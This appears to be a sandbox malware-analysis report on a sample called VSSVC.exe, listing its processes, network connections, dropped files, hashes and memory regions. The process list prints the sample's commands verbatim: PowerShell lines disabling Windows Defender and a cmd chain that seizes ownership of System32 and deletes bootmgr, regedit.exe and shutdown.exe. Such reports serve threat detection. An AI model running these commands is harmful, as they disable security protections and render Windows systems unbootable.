"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force

C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe

Network

Country Destination Domain Proto
US 93.184.221.240:80 tcp
US 93.184.220.29:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
NL 13.69.109.130:443 tcp

Files

memory/3176-132-0x0000000000530000-0x00000000009A6000-memory.dmp

memory/3176-133-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4216-134-0x0000000000000000-mapping.dmp

memory/1772-135-0x0000000000000000-mapping.dmp

memory/4480-136-0x0000000000000000-mapping.dmp

memory/3928-137-0x0000000000000000-mapping.dmp

memory/4216-138-0x00000261FADE0000-0x00000261FAE02000-memory.dmp

memory/4664-139-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

MD5 e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1 b552c6af33cc5a62379028687924406cba8ff74d
SHA256 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512 ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

MD5 e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1 b552c6af33cc5a62379028687924406cba8ff74d
SHA256 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512 ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

memory/4216-142-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/1772-143-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4480-144-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/3928-145-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-146-0x0000000000530000-0x0000000000DA4000-memory.dmp

memory/3928-149-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-150-0x0000000077520000-0x00000000776C3000-memory.dmp

memory/4664-151-0x0000000000530000-0x0000000000DA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/4480-155-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4216-156-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-157-0x0000000000530000-0x0000000000DA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e243a38635ff9a06c87c2a61a2200656
SHA1 ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256 af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

memory/4664-159-0x0000000005EC0000-0x0000000006464000-memory.dmp

memory/4664-160-0x0000000005850000-0x00000000058E2000-memory.dmp

memory/1772-161-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-162-0x0000000005A10000-0x0000000005A1A000-memory.dmp

memory/3176-163-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-164-0x0000000000530000-0x0000000000DA4000-memory.dmp

memory/4664-165-0x0000000077520000-0x00000000776C3000-memory.dmp

memory/4324-166-0x0000000000000000-mapping.dmp

memory/2888-167-0x0000000000000000-mapping.dmp

memory/424-168-0x0000000000000000-mapping.dmp

memory/4988-169-0x0000000000000000-mapping.dmp

memory/3868-170-0x0000000000000000-mapping.dmp

memory/2184-171-0x0000000000000000-mapping.dmp